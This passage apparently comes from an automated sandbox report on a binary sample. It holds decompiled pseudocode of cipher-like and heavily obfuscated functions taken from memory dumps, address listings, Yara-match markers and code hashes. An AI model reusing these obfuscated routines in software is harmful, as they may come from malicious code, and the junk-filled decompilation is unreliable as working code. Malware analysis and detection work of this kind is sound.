						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                        0x00402d93
                                                        0x00402d98
                                                        0x00402da0
                                                        0x00402da9
                                                        0x00402db3
                                                        0x00402dba
                                                        0x00402dc3
                                                        0x00402dce
                                                        0x00402dd6
                                                        0x00402ddf
                                                        0x00402dea
                                                        0x00402df0
                                                        0x00402df5
                                                        0x00402dfe
                                                        0x00402e09
                                                        0x00402e11
                                                        0x00402e1a
                                                        0x00402e25
                                                        0x00402e2d
                                                        0x00402e36
                                                        0x00402e41
                                                        0x00402e49
                                                        0x00402e52
                                                        0x00402e5d
                                                        0x00402e65
                                                        0x00402e6e
                                                        0x00402e80
                                                        0x00402e83
                                                        0x00402f9f
                                                        0x00402fa4
                                                        0x00402e89
                                                        0x00402e89
                                                        0x00402e8c
                                                        0x00402e8e
                                                        0x00402e91
                                                        0x00402e91
                                                        0x00402ef6
                                                        0x00402efb
                                                        0x00402efd
                                                        0x00402f03
                                                        0x00402f05
                                                        0x00402f0b
                                                        0x00402f0d
                                                        0x00402f10
                                                        0x00402f16
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f72
                                                        0x00402f78
                                                        0x00402f7a
                                                        0x00402f80
                                                        0x00402f82
                                                        0x00402f87
                                                        0x00402f88
                                                        0x00402f8b
                                                        0x00402f8e
                                                        0x00402f91
                                                        0x00402f97
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f97
                                                        0x00402fae
                                                        0x00402fae
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                        • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                        • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82E2F, Relevance: .2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fbf783a43c5340227513bfb804fbc75255eb8844c26e6eb85b6bd8e211b8ab0
                                                        • Instruction ID: 09d28b203f470777849aba4317dbb6c77f1009227e1f672589f78769145382fd
                                                        • Opcode Fuzzy Hash: 7fbf783a43c5340227513bfb804fbc75255eb8844c26e6eb85b6bd8e211b8ab0
                                                        • Instruction Fuzzy Hash: D551DA74500206DBCF24EF28C980ABA77F4EF59B05B2044EAF992CB2A1E774D941DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041E814, Relevance: .1, Instructions: 146COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E0041E814(void* __eax, signed int __ebx, void* __ecx, signed char __edx, void* __edi, signed int __esi) {
				signed char _t18;
				void* _t19;
				signed char _t20;
				signed char _t26;
				signed char _t27;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t42;
				signed int _t43;
				signed int _t49;

				_t38 = __esi;
				_t30 = __edx;
				 *0xc16efa8 =  *0xc16efa8 - __edx;
				asm("adc [0xecc9b4a0], cl");
				_t37 =  *0x395fc2cc;
				 *0x395fc2cc = __edi + 1;
				 *0xc48616d2 =  *0xc48616d2 >> 0x9a;
				_push(0xddbd3ccd);
				asm("ror byte [0x16efa8], 0xa1");
				_t26 = __ecx - 0x00000001 ^  *0x704b93b7;
				asm("lodsb");
				 *0x395faf88 =  *0x395faf88 - _t26;
				_t27 = _t26 - 1;
				_t23 = __ebx | 0x94241016;
				_push(_t42);
				asm("sbb ah, 0xb4");
				asm("ror dword [0x8daddd0f], 0x9f");
				 *0x16ef45d8 =  *0x16ef45d8 ^ __esi;
				_t43 = _t42 - 1;
				_t18 = __eax +  *0xcc32c1de + 0xd2 - 0xe0;
				if(_t18 > 0) {
					goto L1;
					do {
						do {
							do {
								do {
									do {
										do {
											L1:
											asm("adc [0x8f83e7b0], al");
										} while (_t27 ==  *0x939ff7b7);
										_t40 = _t40 ^  *0xdc624d74;
										asm("adc [0xc419e217], ecx");
										_t49 =  *0x84e5c4bb & _t23;
									} while (_t49 != 0);
									asm("adc ecx, [0xdd634e75]");
									asm("rcr byte [0xaeb00218], 0x97");
								} while (_t49 >= 0);
								asm("lodsb");
								 *0x2f9d1616 =  *0x2f9d1616 - _t23;
								 *0xc1ddbd1c =  *0xc1ddbd1c - (_t30 |  *0xe77cd173);
								asm("rol byte [0xa8e0cc32], 0xae");
								asm("sbb ecx, [0xc02c16ef]");
								_t18 = _t18 -  *0xefca2585;
								_t30 = 0xb2;
								 *0xa8e0cc32 =  *0xa8e0cc32 >> 0xcd;
								asm("sbb edi, [0xc6a616ef]");
								_t40 = _t40 + 1;
								_t38 = _t38 &  *0xc1daa919;
								_t27 = _t27 &  *0xa8e0cc32;
								asm("adc ebp, [0xc83916ef]");
							} while (_t27 != 0);
							 *0x997775 =  *0x997775 + 0xb2;
							 *0xd8a8c4a8 =  *0xd8a8c4a8 ^ _t18;
							_t40 = _t40 + 1;
							_t38 =  *0x8b7a16ef;
							asm("adc [0xc68ff209], edi");
							_t43 = _t43 - 0xe0cc32c1;
							_t27 = _t27 ^ 0x000000a8;
							_t6 = _t37;
							_t37 =  *0xc83816ef;
							 *0xc83816ef = _t6;
						} while (_t27 != 0);
						_t37 = _t37 &  *0x52173a7b;
						_t19 = _t18 + 1;
						_push(_t19);
						 *0xef45d88d = 0xb2;
						asm("rcl dword [0x81d04116], 0xd3");
						 *0x4052173a =  *0x4052173a >> 0x90;
						asm("adc cl, [0x4052173a]");
						_t7 = _t40;
						_t40 =  *0x9cba1d16;
						 *0x9cba1d16 = _t7;
						_t20 = _t19;
						 *0xaddd0fb4 =  *0xaddd0fb4 >> 0xf9;
						asm("adc esi, 0xef45d88d");
						asm("rol dword [0x87dbae16], 0x12");
						 *0x453d99a1 =  *0x453d99a1 ^ _t37;
						_t23 = 0x32ee16ef;
						 *0x2b16efa8 =  *0x2b16efa8 << 0x2f;
						 *0xbe0b1c6d =  *0xbe0b1c6d - 0x32ee16ef;
						asm("rcr dword [0xcc32c1ef], 0x74");
						asm("rcl byte [0x16efa8e0], 0xd");
						 *0x17ff2f8a =  *0x17ff2f8a >> 0x6e;
						 *0x32bfddbe =  *0x32bfddbe - _t37;
						 *0xefa8e0cc = _t19;
						 *0xfa34f216 =  *0xfa34f216 + 0x32ee16ef;
						_t30 = (0x000000b2 &  *0x1db40ffd) + 0x00000032 | 0x00000004;
						_t18 = _t20 &  *0x32b9d9b0;
						_t38 = _t38 &  *0x81c42916 ^ 0xefa8e0cc;
						_t43 = (_t43 ^  *0xef45d88d) -  *0xb3c62116;
						_t27 = _t27 +  *0xef45d88d -  *0x49395fc0;
						 *0xa2f716d2 =  *0xa2f716d2 ^ _t18;
					} while ( *0xa2f716d2 <= 0);
					asm("rcr dword [0x395f828e], 0x16");
					 *0x36b616d2 =  *0x36b616d2 & 0x32ee16ef;
					asm("rcl dword [0xebb8140b], 0x7c");
					_pop( *0xe0cc32cc);
					 *0x9d8d8ce2 =  *0x9d8d8ce2 << 0xf6;
					asm("rcl dword [0xcc32aece], 0x3f");
					asm("adc ebp, [0x1269e8e]");
					asm("rcr dword [0x32c1d79c], 0x19");
					asm("rcl dword [0xefa8e0cc], 0xfb");
					asm("adc al, [0xccf9af86]");
					return 0x9af2ba16;
				} else {
					__esp = __esp |  *0xa8008977;
					__ecx = __ecx | 0x45d8a8c4;
					__ebp = __ebp -  *0x9e3f16ef;
					asm("sbb ecx, 0xf9e2bc0");
					 *0x40ecb2a1 =  *0x40ecb2a1 >> 0xb7;
					asm("sbb [0x8f16ef88], dh");
					asm("rcl dword [0x16ef45d8], 0xf0");
					__ebx = __ebx +  *0x2bbc121f;
					asm("adc [0xb2a10f9e], ebx");
					__esp =  *0xef8840ec;
					__esi =  *0xccf0cc31;
					 *0x941616d2 =  *0x941616d2 ^ __cl;
					asm("adc esi, [0xdec32e33]");
					_push( *0xe0cc32c1);
					asm("sbb cl, [0x9a8081e2]");
					__dh = __dh &  *0xa8c4a800;
					_t14 = __ebp;
					__ebp =  *0x16ef45d8;
					 *0x16ef45d8 = _t14;
					asm("rcr byte [0x3a78d6b6], 0xe9");
					 *0x50405217 =  *0x50405217 + __ecx;
					asm("adc [0xef45d88d], esi");
					__al = __al | 0x00000016;
					return __eax;
				}
			}














                                                        0x0041e814
                                                        0x0041e814
                                                        0x0041e81d
                                                        0x0041e824
                                                        0x0041e82a
                                                        0x0041e82a
                                                        0x0041e831
                                                        0x0041e838
                                                        0x0041e843
                                                        0x0041e84a
                                                        0x0041e850
                                                        0x0041e851
                                                        0x0041e857
                                                        0x0041e85a
                                                        0x0041e860
                                                        0x0041e861
                                                        0x0041e864
                                                        0x0041e86b
                                                        0x0041e871
                                                        0x0041e872
                                                        0x0041e876
                                                        0x00000000
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a3
                                                        0x0041e5a9
                                                        0x0041e5a9
                                                        0x0041e5b1
                                                        0x0041e5b7
                                                        0x0041e5bd
                                                        0x0041e5bd
                                                        0x0041e5c6
                                                        0x0041e5cc
                                                        0x0041e5cc
                                                        0x0041e5db
                                                        0x0041e5e2
                                                        0x0041e5e8
                                                        0x0041e5ee
                                                        0x0041e5f5
                                                        0x0041e5fb
                                                        0x0041e601
                                                        0x0041e603
                                                        0x0041e60a
                                                        0x0041e610
                                                        0x0041e611
                                                        0x0041e617
                                                        0x0041e61d
                                                        0x0041e61d
                                                        0x0041e629
                                                        0x0041e62f
                                                        0x0041e635
                                                        0x0041e636
                                                        0x0041e63c
                                                        0x0041e642
                                                        0x0041e648
                                                        0x0041e64b
                                                        0x0041e64b
                                                        0x0041e64b
                                                        0x0041e64b
                                                        0x0041e657
                                                        0x0041e65d
                                                        0x0041e65e
                                                        0x0041e65f
                                                        0x0041e665
                                                        0x0041e66c
                                                        0x0041e680
                                                        0x0041e68d
                                                        0x0041e68d
                                                        0x0041e68d
                                                        0x0041e693
                                                        0x0041e694
                                                        0x0041e69b
                                                        0x0041e6a1
                                                        0x0041e6ae
                                                        0x0041e6b4
                                                        0x0041e6c6
                                                        0x0041e6cd
                                                        0x0041e6d3
                                                        0x0041e6da
                                                        0x0041e6e1
                                                        0x0041e6e8
                                                        0x0041e703
                                                        0x0041e709
                                                        0x0041e70f
                                                        0x0041e712
                                                        0x0041e718
                                                        0x0041e71e
                                                        0x0041e72a
                                                        0x0041e730
                                                        0x0041e730
                                                        0x0041e742
                                                        0x0041e74a
                                                        0x0041e750
                                                        0x0041e757
                                                        0x0041e763
                                                        0x0041e76a
                                                        0x0041e777
                                                        0x0041e77d
                                                        0x0041e784
                                                        0x0041e791
                                                        0x0041e797
                                                        0x0041e87c
                                                        0x0041e87c
                                                        0x0041e882
                                                        0x0041e888
                                                        0x0041e88e
                                                        0x0041e894
                                                        0x0041e89b
                                                        0x0041e8ad
                                                        0x0041e8b4
                                                        0x0041e8ba
                                                        0x0041e8c0
                                                        0x0041e8cc
                                                        0x0041e8d7
                                                        0x0041e8dd
                                                        0x0041e8e3
                                                        0x0041e8ef
                                                        0x0041e8f5
                                                        0x0041e8fb
                                                        0x0041e8fb
                                                        0x0041e8fb
                                                        0x0041e901
                                                        0x0041e908
                                                        0x0041e90e
                                                        0x0041e914
                                                        0x0041e916
                                                        0x0041e916

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aab178634860f24fb441d16bad4eaa488301bd4c638a7a1bd520085a4e5d5f20
                                                        • Instruction ID: bdcca7c01f4c3f205313e60e98937ca78f012cbef8b7c4d481d4524ee612a72d
                                                        • Opcode Fuzzy Hash: aab178634860f24fb441d16bad4eaa488301bd4c638a7a1bd520085a4e5d5f20
                                                        • Instruction Fuzzy Hash: 5071213684D7C1DFDB15EF78E8AA6563F71F782334748038AC8A24B1E2D76424A6CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041EB8A, Relevance: .1, Instructions: 144COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E0041EB8A(signed int __eax, signed int __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t23;
				signed char _t27;
				signed char _t28;
				signed int _t36;
				void* _t37;

				asm("rcr byte [0x6e0a651c], 0x28");
				asm("adc cl, 0xb7");
				_pop( *0xdb3c51d1);
				_t23 = (__eax & 0xe4c04ce9 ^  *0x2bb78dd7) -  *0xcef0fa24;
				asm("sbb edi, 0x8f63762d");
				 *0xd0a23192 =  *0xd0a23192 - _t37;
				_t27 = (__ebx ^  *0x3de45913) +  *0x2bad28fe & 0x000000e4;
				_t28 =  *0xf6277f14;
				 *0xf6277f14 = _t27;
				asm("movsw");
				asm("rcl byte [0x3dd07a28], 0x6f");
				if(_t27 <= 0) {
					L1:
					_t28 = _t28 & 0x0000001a;
					 *0x3c03bfde =  *0x3c03bfde & _t36;
					_t2 = _t23;
					_t23 =  *0x758ebe21;
					 *0x758ebe21 = _t2;
					goto L1;
				}
				asm("sbb ebx, 0x6bfeb176");
				asm("adc [0xe9ee321d], esi");
				asm("adc ecx, [0xcd276c27]");
				asm("adc edi, [0xbbd0eede]");
				 *0x494948c1 =  *0x494948c1 | __esp;
				__edx = __edx &  *0xafb3be39;
				asm("rcr dword [0x4cc5d32d], 0xaf");
				__al = __al - 0x24;
				__ebx = __ebx +  *0xc689f989;
				__ah = __ah ^ 0x000000b1;
				__cl = __cl +  *0xfb10d6b1;
				__ebp = __ebp -  *0x8282238c;
				 *0x8744f01e =  *0x8744f01e >> 0x30;
				__edx = __edx -  *0xb965b109;
				__ebx =  *0xb12eab69 * 0x46d2;
				asm("rol byte [0x840d112c], 0xb0");
				__ebx = __ebx;
				_t3 = __esi;
				__esi =  *0x5e18e52d;
				 *0x5e18e52d = _t3;
				if(__esp >= 0x401756ea) {
					goto L1;
				}
				 *0x6a058573 =  *0x6a058573 >> 0x5b;
				asm("ror dword [0x55241a1d], 0x6d");
				 *0xb8368a =  *0xb8368a + 0x10;
				__ebx = __ebx + 0x329569ef;
				 *0x7acfefa =  *0x7acfefa << 0x26;
				 *0xdd4c1321 =  *0xdd4c1321 & __ecx;
				asm("adc ecx, [0x42ad8cc5]");
				asm("adc esp, [0xce38b81d]");
				asm("stosd");
				__eax = __eax - 0x70b4213;
				__esi = __esi + 1;
				__esp = __edi;
				if(__ebx !=  *0xf9533a2f) {
					goto L1;
				}
				asm("rcl dword [0xe890667a], 0x45");
				asm("scasd");
				_push(0xb5351536);
				__al = __al | 0x00000034;
				__ecx =  *0x80c43933;
				_push( *0xf7751031);
				__ebx = __ebx +  *0xeaa32d25;
				_t10 = __ebp;
				__ebp =  *0x1fed6d0b;
				 *0x1fed6d0b = _t10;
				__dl = __dl ^ 0x00000010;
				asm("adc [0x8d6a1f02], cl");
				_push(__ecx);
				__esi = __esi -  *0x38954261;
				asm("sbb eax, [0x1392ad6]");
				_push(__esi);
				__eax = __eax - 0x50e75eba;
				__ecx = __ecx + 1;
				asm("ror byte [0xefe01dc9], 0xd5");
				 *0xc0fa10c5 =  *0xc0fa10c5 & __edx;
				__esp = __esp + 0xcbf39289;
				__edx = __edx |  *0x717d79b;
				__eax = __eax ^  *0x3f436e8e;
				asm("adc eax, 0x38d36cc1");
				asm("sbb esp, 0x7895178b");
				asm("adc edi, [0x7f85a166]");
				__edx = __edx &  *0x5dfda2d8;
				_push( *0x3e66ac85);
				__ebx = __ebx &  *0x56ccc7b8;
				__esi = __esi &  *0x55fab0f3;
				 *0xf5b2a528 =  *0xf5b2a528 ^ __bh;
				__eax = __eax + 1;
				 *0x8cd8eeda =  *0x8cd8eeda << 0xa4;
				asm("rcl dword [0x58a2332f], 0x58");
				asm("sbb edi, [0xb336aeff]");
				 *0x26616bd6 =  *0x26616bd6 << 0x49;
				asm("rcl byte [0xe78bd4e4], 0xd2");
				__edx = __edx +  *0xc4bcb6c4;
				 *0x239e033b =  *0x239e033b - __ebp;
				if(__ah != 0 ||  *0xd5c29d7b <= __esi) {
					goto L1;
				}
				 *0x8afa3276 =  *0x8afa3276 << 0xb1;
				__edi = __edi ^  *0xadf34733;
				 *0x876c0586 =  *0x876c0586 << 0x46;
				__esp = __esp & 0x771686bd;
				asm("rcr dword [0xa56f3e09], 0x48");
				__al = __al ^  *0xef640000;
				__eax = __esp;
				__esi = __esi +  *0xa4a7c992;
				if(__esi > 0) {
					goto L1;
				}
				__ecx =  *0xbede8f7f * 0x6c56;
				if((__ebp & 0xf71c5cb8) > 0) {
					goto L1;
				}
				__esp = __esp ^  *0x59040f77;
				 *0x3b98c06c =  *0x3b98c06c >> 0x9e;
				__ebp = __ebp + 1;
				__esi = __esi |  *0x67b13da9;
				_pop(__ebx);
				__esp = __esp +  *0xb9a43e66;
				 *0x3946c463 =  *0x3946c463 | __ch;
				 *0x8ff172c6 =  *0x8ff172c6 + __ch;
				__eax = __eax + 1;
				asm("adc eax, 0xc34c781b");
				if(__eax != 0 || ( *0xd789d57b & __esp) <= 0) {
					goto L1;
				}
				__ebp =  *0xfdffb77e * 0xcd8;
				__edi = __edi &  *0xc031601f;
				__cl = __cl &  *0xc4fa182c;
				_push( *0xad487281);
				return __eax;
			}








                                                        0x0041eb95
                                                        0x0041eb9c
                                                        0x0041ebb7
                                                        0x0041ebbd
                                                        0x0041ebc9
                                                        0x0041ebcf
                                                        0x0041ebd5
                                                        0x0041ebd8
                                                        0x0041ebd8
                                                        0x0041ebde
                                                        0x0041ebe0
                                                        0x0041ebe9
                                                        0x0041eb78
                                                        0x0041eb78
                                                        0x0041eb7b
                                                        0x0041eb81
                                                        0x0041eb81
                                                        0x0041eb81
                                                        0x00000000
                                                        0x0041eb81
                                                        0x0041ebeb
                                                        0x0041ebf1
                                                        0x0041ebf7
                                                        0x0041ebfd
                                                        0x0041ec04
                                                        0x0041ec0a
                                                        0x0041ec10
                                                        0x0041ec17
                                                        0x0041ec19
                                                        0x0041ec25
                                                        0x0041ec28
                                                        0x0041ec2e
                                                        0x0041ec34
                                                        0x0041ec3b
                                                        0x0041ec41
                                                        0x0041ec4b
                                                        0x0041ec52
                                                        0x0041ec53
                                                        0x0041ec53
                                                        0x0041ec53
                                                        0x0041ec5f
                                                        0x00000000
                                                        0x00000000
                                                        0x0041ec65
                                                        0x0041ec72
                                                        0x0041ec79
                                                        0x0041ec7f
                                                        0x0041ec85
                                                        0x0041ec8c
                                                        0x0041ec92
                                                        0x0041ec9f
                                                        0x0041eca5
                                                        0x0041ecac
                                                        0x0041ecb7
                                                        0x0041ecc0
                                                        0x0041ecc1
                                                        0x00000000
                                                        0x00000000
                                                        0x0041ecc7
                                                        0x0041ecd4
                                                        0x0041ecd5
                                                        0x0041ecda
                                                        0x0041ecdc
                                                        0x0041ece8
                                                        0x0041ecee
                                                        0x0041ecf4
                                                        0x0041ecf4
                                                        0x0041ecf4
                                                        0x0041ecfa
                                                        0x0041ecfd
                                                        0x0041ed03
                                                        0x0041ed04
                                                        0x0041ed0a
                                                        0x0041ed1c
                                                        0x0041ed1d
                                                        0x0041ed22
                                                        0x0041ed23
                                                        0x0041ed2a
                                                        0x0041ed30
                                                        0x0041ed36
                                                        0x0041ed3c
                                                        0x0041ed42
                                                        0x0041ed47
                                                        0x0041ed4d
                                                        0x0041ed53
                                                        0x0041ed59
                                                        0x0041ed66
                                                        0x0041ed6c
                                                        0x0041ed72
                                                        0x0041ed78
                                                        0x0041ed7f
                                                        0x0041ed86
                                                        0x0041ed8d
                                                        0x0041ed93
                                                        0x0041ed9a
                                                        0x0041eda1
                                                        0x0041eda7
                                                        0x0041edb3
                                                        0x00000000
                                                        0x00000000
                                                        0x0041edc5
                                                        0x0041edcd
                                                        0x0041edd3
                                                        0x0041edda
                                                        0x0041ede0
                                                        0x0041ede7
                                                        0x0041eded
                                                        0x0041edee
                                                        0x0041edf4
                                                        0x00000000
                                                        0x00000000
                                                        0x0041edfa
                                                        0x0041ee0a
                                                        0x00000000
                                                        0x00000000
                                                        0x0041ee10
                                                        0x0041ee16
                                                        0x0041ee1d
                                                        0x0041ee1e
                                                        0x0041ee24
                                                        0x0041ee25
                                                        0x0041ee2b
                                                        0x0041ee31
                                                        0x0041ee37
                                                        0x0041ee38
                                                        0x0041ee3d
                                                        0x00000000
                                                        0x00000000
                                                        0x0041ee4f
                                                        0x0041ee59
                                                        0x0041ee5f
                                                        0x0041ee65
                                                        0x0041ee6b

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de73a36bc50bd753693518c5c314a9e9c6a8700d6fa43635f398942a0a5e7527
                                                        • Instruction ID: 9292b4549355b6b80f16425972f35bb24bb68e16d88108ac6beea5b80adae10a
                                                        • Opcode Fuzzy Hash: de73a36bc50bd753693518c5c314a9e9c6a8700d6fa43635f398942a0a5e7527
                                                        • Instruction Fuzzy Hash: 59616677D18390DFEB12CF38DD9AA853BB1F316720B48424EC9A25B596C7392152CF89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B54680, Relevance: .1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9985a409b715796e8a26d2bc1508ce94c9fb856db30c9691548709e03db8fc9
                                                        • Instruction ID: 5e13d65cd2ad750e8d550508d45df80129e33667adb2d4edf009092d5aea5f0a
                                                        • Opcode Fuzzy Hash: d9985a409b715796e8a26d2bc1508ce94c9fb856db30c9691548709e03db8fc9
                                                        • Instruction Fuzzy Hash: 70413630208665AFE7288F21C8E1B7733E8EF4635AF1484DEED834B591C7249C89E720
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BD5955, Relevance: .1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c437cd31c1aaa8d5345bf39dd7fcb35a37c3fae04438cb6335333d56e7b4176
                                                        • Instruction ID: e61d70f90357d3aa3d05da444111c7ab0a206d516004e1b1468b2746dd8eb40d
                                                        • Opcode Fuzzy Hash: 7c437cd31c1aaa8d5345bf39dd7fcb35a37c3fae04438cb6335333d56e7b4176
                                                        • Instruction Fuzzy Hash: B541D034104AA6DAD730CF29C4806F6FBF5FF19304F14898AE4D58B252E336E956DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                        0x00401030
                                                        0x0040105b
                                                        0x0040105d
                                                        0x00401063
                                                        0x00401065
                                                        0x00401065
                                                        0x00401071
                                                        0x00401076
                                                        0x0040107c
                                                        0x004010ac
                                                        0x004010ae
                                                        0x004010b4
                                                        0x004010ba
                                                        0x004010bc
                                                        0x004010bc
                                                        0x004010cb
                                                        0x004010d0
                                                        0x004010d6
                                                        0x00401101
                                                        0x00401103
                                                        0x00401109
                                                        0x0040110f
                                                        0x00401111
                                                        0x00401111
                                                        0x00401120
                                                        0x00401128
                                                        0x0040112b
                                                        0x0040114f
                                                        0x00401156
                                                        0x0040115d
                                                        0x00401169
                                                        0x0040116c
                                                        0x0040116f
